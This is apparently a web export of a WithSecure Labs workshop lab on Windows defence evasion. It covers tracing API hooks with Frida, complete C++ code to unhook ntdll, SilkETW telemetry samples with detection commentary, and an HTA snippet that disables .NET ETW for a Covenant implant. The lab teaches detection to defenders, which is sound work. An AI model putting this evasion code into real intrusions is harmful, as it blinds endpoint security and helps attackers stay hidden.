{"id":10523,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/"},"modified":"2026-05-25T10:20:51","modified_gmt":"2026-05-25T09:20:51","slug":"attack-detection-fundamentals-2021-windows-lab-2","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #2"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #2<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 4\u6708, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_ae3b0e726d7b54bf8217b896695ed1f9\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints.  This included the offensive and defensive use of API hooking, as well as the theft of cookies to enabled &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noopener\">previous lab<\/a>, we started developing an initial access payload that would ultimately execute a <a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a> Grunt on the target host. Initially we saw how AMSI would detect and block our shellcode on launch, and we took steps to evade that using The Wover and Odzhan&#x27;s <a href=\"https:\/\/github.com\/TheWover\/\" target=\"_blank\" rel=\"noopener\">Donut<\/a> project. From there we packaged our shellcode into a Dynamic Link Library (DLL), before packaging that into an HTA file, more likely to be permitted through a web or mail filter (and more likely to run when a target user clicks on it!).<\/p>\n<p>Along the way we saw plenty of detection opportunities including:<\/p>\n<ul>\n<li>The initial AMSI block event from Windows Defender.<\/li>\n<li>Our many opsec fails highlighted by FireEye&#x27;s <a href=\"https:\/\/github.com\/fireeye\/capa\" target=\"_blank\" rel=\"noopener\">CAPA<\/a> tool.<\/li>\n<li>Our use of the ever-green CreateRemoteThread API call.<\/li>\n<li>Web or mail filtering logs delivering our HTA file to the target endpoint.<\/li>\n<li>The anomalous DLL load performed by Mshta.exe from the %APPDATA% directory.<\/li>\n<\/ul>\n<p>In this lab, we&#x27;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#x27;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n<p>Let&#x27;s get started.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM (ideally running <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a>, SwiftOnSecurity&#x27;s <a href=\"https:\/\/raw.githubusercontent.com\/SwiftOnSecurity\/sysmon-config\/master\/sysmonconfig-export.xml\" target=\"_blank\" rel=\"noopener\">config<\/a> will do)<\/li>\n<li>1x Kali VM (Optional)<\/li>\n<li>Covenant<\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/fireeye\/SilkETW\" target=\"_blank\" rel=\"noopener\">SilkETW<\/a><\/li>\n<li><a href=\"https:\/\/frida.re\/docs\/installation\/\" target=\"_blank\" rel=\"noopener\">Frida for Windows<\/a><\/li>\n<\/ul>\n<p>DISCLAMER: Set up of the tools and the testing environment is not covered comprehensively within this lab. We will assume basic familiarity with Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>API Hooking<\/h3>\n<p>Our existing payload could work against basic AV software, however, modern EDRs will have a lot of other automated detection mechanisms and sensors available to spot this type of malicious activity. One of those mechanisms we can target is &quot;API Hooking&quot;. As discussed in the workshop, API hooking is a technique used to hijack the execution flow of a normal API call. It has been used for a variety of reasons, but has been popularised in AV\/EDRs since it allows the detection engine to inspect which APIs are used by the inspected processes and take decisions based on some underlying logic, even outright preventing activity it deems to be malicious.<\/p>\n<p>For example, the function we used to trigger our shellcode is CreateRemoteThread. This function, despite being used legitimately by software, is also heavily abused by malware. EDRs will perform API hooking in order to monitor its usage and the arguments passed to it. The logic with which a product decides whether an API call is malicious or not can depend on many factors, a few examples:<\/p>\n<ul>\n<li>If the thread is called on an address that is not backed by an image on disk; this could be a sign that the memory was allocated with malicious intent.<\/li>\n<li>If the memory protection of the memory pages where the new thread is started is Read Write and Execute (RWX), it could be a sign of malicious activity.<\/li>\n<\/ul>\n<p>Of course, this is an over-simplification of the decision process that a security product can make, but open-source memory scanners, such as <a href=\"https:\/\/github.com\/hasherezade\/pe-sieve\" target=\"_blank\" rel=\"noopener\">Pe-Sieve<\/a>, <a href=\"https:\/\/github.com\/forrest-orr\/moneta\" target=\"_blank\" rel=\"noopener\">Moneta<\/a>, Volatility&#x27;s <a href=\"https:\/\/github.com\/volatilityfoundation\/volatility\/wiki\/Command-Reference-Mal#malfind\" target=\"_blank\" rel=\"noopener\">malfind<\/a> or <a href=\"https:\/\/gist.github.com\/jaredcatkinson\/23905d34537ce4b5b1818c3e6405c1d2\" target=\"_blank\" rel=\"noopener\">Get-InjectedThreads<\/a> contain enough information to clarify this process.<\/p>\n<p>Since we won&#x27;t use commercial products or real EDRs for this demo, we will perform API hooking using the popular open source framework Frida. With Frida it is possible to intercept API calls in a similar way to a commercial EDR.<\/p>\n<p>Before executing Frida, it is necessary to place an &#x27;alert()&#x27; in our HTA, this will give us time to attach Frida to the &#x27;mshta&#x27; process and inspect the functions.<\/p>\n<p>After placing the &#x27;alert&#x27; function, we can execute our HTA.<\/p>\n<p>We then need to find the PID of our HTA process, this can be done using Task Manager or any other means. The Frida command to execute will look like the following:<\/p>\n<pre><code class=\"language-bash\">frida-trace.exe -p 7280 -i NtCreateThreadEx<\/code><\/pre>\n<p>Where &#x27;-p&#x27; will indicate the PID of mshta and &#x27;-i&#x27; will be the function we want to intercept. We chose &#x27;NtCreateThreadEx&#x27; since it&#x27;s the underlying function within &#x27;ntdll&#x27; used by &#x27;CreateRemoteThread&#x27; and usually EDRs tend to put their hook in &#x27;ntdll&#x27; rather than a higher level library.<\/p>\n<p>Clicking &quot;OK&quot; on the alert box within our HTA will allow the script to continue and we should see the following:<\/p>\n<pre><code class=\"language-bash\">PS C:\\Users\\Developer\\Desktop\\workshop&gt; frida-trace.exe -p 7280 -i NtCreateThreadEx\nInstrumenting...\nNtCreateThreadEx: Auto-generated handler at &quot;C:\\\\Users\\\\Developer\\\\Desktop\\\\workshop\\\\__handlers__\\\\ntdll.dll\\\\NtCreateThreadEx.js&quot;\nStarted tracing 1 function. Press Ctrl+C to stop.\n\/* TID 0x25f8 *\/\n6281 ms NtCreateThreadEx()<\/code><\/pre>\n<p>This means that Frida was able to intercept and inspect our API call. We haven&#x27;t implemented any subsequent detection logic here, but an EDR would probably have stopped this action from happening.<\/p>\n<p>A technique quite popular amongst malware authors and red teamers is to remove the hooks from the intercepted functions. This would remove (at least partially) the ability of the EDR to receive telemetry about the API usage. Sometimes, removing API hooks is sufficient to circumvent preventive controls. One of the first publicly documented examples of this in the red teaming world comes from MDSec&#x27;s <a href=\"https:\/\/www.mdsec.co.uk\/2019\/03\/silencing-cylance-a-case-study-in-modern-edrs\/\" target=\"_blank\" rel=\"noopener\">Silencing Cylance<\/a> blog post.<\/p>\n<p>One way in which hooks can be removed from a library, is to replace its code with the one fetched directly from the on-disk DLL. This approach works since the EDRs will only change the in-memory view of the DLL and not the one on disk. Couple this with the fact that a process has full control over their memory space and we can remove the installed hooks.<\/p>\n<p>Cylance itself published interesting <a href=\"https:\/\/blogs.blackberry.com\/en\/2017\/02\/universal-unhooking-blinding-security-software\" target=\"_blank\" rel=\"noopener\">research<\/a> on the topic, where they demonstrate how the concept above can be implemented programmatically. The code below is taken from ired.team&#x27;s <a href=\"https:\/\/www.ired.team\/offensive-security\/defense-evasion\/how-to-unhook-a-dll-using-c++\" target=\"_blank\" rel=\"noopener\">&amp;#x27;Full DLL Unhooking in C++&amp;#x27;<\/a>:<\/p>\n<pre><code class=\"language-bash\">\/\/ Unhook ntdll.dll\nHANDLE process = GetCurrentProcess();\nMODULEINFO mi = {};\nHMODULE ntdllModule = GetModuleHandleA(&quot;ntdll.dll&quot;);\n\nGetModuleInformation(process, ntdllModule, &amp;mi, sizeof(mi));\nLPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;\nHANDLE ntdllFile = CreateFileA(&quot;c:\\\\windows\\\\system32\\\\ntdll.dll&quot;, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);\nHANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);\nLPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);\n\nPIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;\nPIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader-&gt;e_lfanew);\n\nfor (WORD i = 0; i &lt; hookedNtHeader-&gt;FileHeader.NumberOfSections; i++) {\nPIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));\nif (!strcmp((char*)hookedSectionHeader-&gt;Name, (char*)&quot;.text&quot;)) {\nDWORD oldProtection = 0;\nbool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &amp;oldProtection);\nmemcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize);\nisProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize, oldProtection, &amp;oldProtection);\n}\n}\n\nCloseHandle(process);\nCloseHandle(ntdllFile);\nCloseHandle(ntdllMapping);\nFreeLibrary(ntdllModule);<\/code><\/pre>\n<p>The code above will remove all the hooks from ntdll, this can be verified using Frida again. You will see that this time, no function will be intercepted. It&#x27;s worth mentioning here that this code will get a handle to the on-disk ntdll; a DLL it&#x27;s already loaded. Aside from a security product detecting the eventual unhooking itself, this repeated load could in itself be a detection opportunity.<\/p>\n<h3>ETW Bypassing<\/h3>\n<p>We mentioned how EDRs might use other telemetry sources other than standard API hooking, one of these is Event Tracing for Windows, or ETW. Whilst designed for monitoring and troubleshooting purposes, ETW is used by defenders to track abuse of .NET and many other different attacks, as described in WithSecure&#x27;s <a href=\"https:\/\/blog.f-secure.com\/detecting-malicious-use-of-net-part-2\/\" target=\"_blank\" rel=\"noopener\">&amp;#x27;Detecting Malicious Use of .NET&amp;#x27;<\/a>.<\/p>\n<p>We will not discuss ETW internals, the fundamental concept is that application can subscribe to ETW providers and receive events. Events can be either generated by the Windows kernel or by an application itself. FireEye&#x27;s <a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2019\/03\/silketw-because-free-telemetry-is-free.html\" target=\"_blank\" rel=\"noopener\">&amp;#x27;SilkETW: Because Free Telemetry is \u2026 Free!&amp;#x27;<\/a> showed how the &#x27;Microsoft-Windows-DotNETRuntime&#x27; provider can be used to detect .NET abuse.<\/p>\n<p>Let&#x27;s download SilkETW, FireEye&#x27;s ETW collector tool, and run it with the following options:<\/p>\n<pre><code class=\"language-bash\">.\\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p C:\\windows\\temp\\etw.json<\/code><\/pre>\n<p>Launch the HTA attack again, and we should see a considerable amount of events generated. Try also executing some post-exploitation commands from the Grunt to generate even more telemetry. You will notice that the amount of events will grow quickly as you spawn a Covenant implant and execute some commands.<\/p>\n<p>We will not dig deep into the types of events generated by the .NET ETW provider, but at a high level we can have telemetry for:<\/p>\n<ul>\n<li>Assembly Load events.<\/li>\n<li>P\\Invoke invocation (Win32 APIs).<\/li>\n<li>JIT compilation of methods.<\/li>\n<\/ul>\n<p>All these events can give useful information to defenders. An example of these could be an Assembly Load event such as the one below:<\/p>\n<pre><code class=\"language-bash\">{\n&quot;ProviderGuid&quot;: &quot;e13c0d23-ccbc-4e12-931b-d9cc2eee27e4&quot;,\n&quot;YaraMatch&quot;: [],\n&quot;ProviderName&quot;: &quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;EventName&quot;: &quot;Loader\/AssemblyLoad&quot;,\n&quot;Opcode&quot;: 37,\n&quot;OpcodeName&quot;: &quot;AssemblyLoad&quot;,\n&quot;TimeStamp&quot;: &quot;2021-03-26T13:24:13.5921269-07:00&quot;,\n&quot;ThreadID&quot;: 4024,\n&quot;ProcessID&quot;: 7164,\n&quot;ProcessName&quot;: &quot;notepad&quot;,\n&quot;PointerSize&quot;: 4,\n&quot;EventDataLength&quot;: 166,\n&quot;XmlEventData&quot;: {\n&quot;FormattedMessage&quot;: &quot;AssemblyID=46,911,120;\\r\\nAppDomainID=46,825,120;\\r\\nAssemblyFlags=0;\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=rywvgj1k.0jo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null &quot;,\n&quot;ProviderName&quot;: &quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;ClrInstanceID&quot;: &quot;25&quot;,\n&quot;AppDomainID&quot;: &quot;46,825,120&quot;,\n&quot;BindingID&quot;: &quot;0&quot;,\n&quot;MSec&quot;: &quot;34563.0716&quot;,\n&quot;AssemblyID&quot;: &quot;46,911,120&quot;,\n&quot;PID&quot;: &quot;7164&quot;,\n&quot;TID&quot;: &quot;4024&quot;,\n&quot;AssemblyFlags&quot;: &quot;0&quot;,\n&quot;PName&quot;: &quot;&quot;,\n&quot;FullyQualifiedAssemblyName&quot;: &quot;rywvgj1k.0jo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null&quot;,\n&quot;EventName&quot;: &quot;Loader\/AssemblyLoad&quot;\n}\n}<\/code><\/pre>\n<p>BLUE TEAM ALERT: Whilst it looks legitimate, the field &#x27;ClrInstanceID&#x27; is equal to &#x27;rywvgj1k.0jo&#x27; , a very random and uncommon value. If you inspect similar events, you will notice that other processes than notepad.exe will generate more legitimate looking &#x27;ClrInstanceId&#x27;s.<\/p>\n<p>Another example, the &#x27;DCOMCommand&#x27; was executed locally, below we can see one of the events that was generated after that:<\/p>\n<pre><code class=\"language-bash\">{\n&quot;ProviderGuid&quot;:&quot;e13c0d23-ccbc-4e12-931b-d9cc2eee27e4&quot;,\n&quot;YaraMatch&quot;:[],\n&quot;ProviderName&quot;:&quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;EventName&quot;:&quot;Method\/LoadVerbose&quot;,\n&quot;Opcode&quot;:37,\n&quot;OpcodeName&quot;:&quot;LoadVerbose&quot;,\n&quot;TimeStamp&quot;:&quot;2021-03-26T13:24:48.468346-07:00&quot;,\n&quot;ThreadID&quot;:7424,\n&quot;ProcessID&quot;:7164,\n&quot;ProcessName&quot;:&quot;notepad&quot;,\n&quot;PointerSize&quot;:4,\n&quot;EventDataLength&quot;:280,\n&quot;XmlEventData&quot;:{\n&quot;ModuleID&quot;:&quot;1,790,447,616&quot;,\n&quot;PID&quot;:&quot;7164&quot;,\n&quot;ClrInstanceID&quot;:&quot;25&quot;,\n&quot;MethodSignature&quot;:&quot;instance void ()&quot;,\n&quot;MethodID&quot;:&quot;184,619,272&quot;,\n&quot;MethodFlags&quot;:&quot;Generic|Jitted&quot;,\n&quot;MethodToken&quot;:&quot;100,677,914&quot;,\n&quot;FormattedMessage&quot;:&quot;MethodID=184,619,272;\\r\\nModuleID=1,790,447,616;\\r\\nMethodStartAddress=179,606,592;\\r\\nMethodSize=11;\\r\\nMethodToken=100,677,914;\\r\\nMethodFlags=Generic|Jitted;\\r\\nMethodNamespace=System.Collections.Generic.Dictionary&#x27;2[SharpSploit.LateralMovement.DCOM+DCOMMethod,System.Guid];\\r\\nMethodName=.ctor;\\r\\nMethodSignature=instance void ();\\r\\nClrInstanceID=25 &quot;,\n&quot;MSec&quot;:&quot;69439.2907&quot;,\n&quot;MethodNamespace&quot;:&quot;System.Collections.Generic.Dictionary&#x27;2[SharpSploit.LateralMovement.DCOM+DCOMMethod,System.Guid]&quot;,\n&quot;MethodStartAddress&quot;:&quot;179,606,592&quot;,\n&quot;TID&quot;:&quot;7424&quot;,\n&quot;MethodSize&quot;:&quot;11&quot;,\n&quot;ProviderName&quot;:&quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;PName&quot;:&quot;&quot;,\n&quot;MethodName&quot;:&quot;.ctor&quot;,\n&quot;EventName&quot;:&quot;Method\/LoadVerbose&quot;\n}\n}<\/code><\/pre>\n<p>We can see some familiar keywords such as &#x27;SharpSploit&#x27;. <a href=\"https:\/\/github.com\/cobbr\/SharpSploit\" target=\"_blank\" rel=\"noopener\">SharpSploit<\/a> is a C# library heavily used within Covenant and therefore it makes sense to see references to it.<\/p>\n<p>From an attacker&#x27;s perspective, this is not optimal, as we would like to minimise our footprint and detection opportunities. Interestingly, .NET related events are generated by the process itself, notepad in this case, and not the Kernel. What this means, similarly to API hooking, is that since we have full control over our own process we can simply manipulate it to stop generating those events. This was initially discovered by Adam Chester in his blog, <a href=\"https:\/\/blog.xpnsec.com\/hiding-your-dotnet-etw\/\" target=\"_blank\" rel=\"noopener\">&amp;#x27;Hiding your .NET &#8211; ETW&amp;#x27;<\/a>.<\/p>\n<p>There are two commonly known ways in which we could hide our activity from .NET ETW:<\/p>\n<ul>\n<li>We can patch the EtwEventWrite function within ntdll. Doing so, the process will not emit ETW events, but this requires patching the memory from within our DLL, depending on the situation this might not desirable (i.e. we might have already produced incriminating ETW events prior to us being able to disable it).<\/li>\n<li>By modifying the environment variable &#x27;COMPlus_EtwEnabled&#x27; and setting it to 0, as discovered again by Adam Chester in his <a href=\"https:\/\/blog.xpnsec.com\/hiding-your-dotnet-complus-etwenabled\/\" target=\"_blank\" rel=\"noopener\">&amp;#x27;Hiding your .NET &#8211; COMPlus_ETWEnabled&amp;#x27;<\/a> blog, will disable ETW in all the child processes created by the process that sets the variable.<\/li>\n<\/ul>\n<p>Considering our scenario, it would make sense to set the aforementioned environment variable from within the HTA, since we will spawn a notepad process that will host our Grunt. To accomplish this, we can create a &#x27;WScript.Shell&#x27; object and access its &#x27;Environment&#x27; member:<\/p>\n<pre><code class=\"language-bash\">var shell = new ActiveXObject(&#x27;WScript.Shell&#x27;);\nshell.Environment(&#x27;Process&#x27;)(&#x27;COMPLUS_ETWEnabled&#x27;) = 0;<\/code><\/pre>\n<p>If we try to execute the same HTA after adding the code above, we will not see any event being generated.<\/p>\n<h2>Conclusions<\/h2>\n<p>Across this two part guide, we touched upon many concepts that could be used by defenders to assess their posture and stress their endpoint security solutions. It is by no means a comprehensive reference, nor the most advanced attack, but shows some of the defence evasion techniques that we commonly see in malware. The concepts covered included:<\/p>\n<ul>\n<li>AMSI blocking, and bypassing with Donut.<\/li>\n<li>Static Analysis with FireEye&#x27;s CAPA.<\/li>\n<li>Creation of a process injection DLL using the CreateRemoteThread API function (and it being detected with Sysmon!).<\/li>\n<li>Embedding of our DLL into an HTA file which decodes and drops this to disk (MSHTA dropping 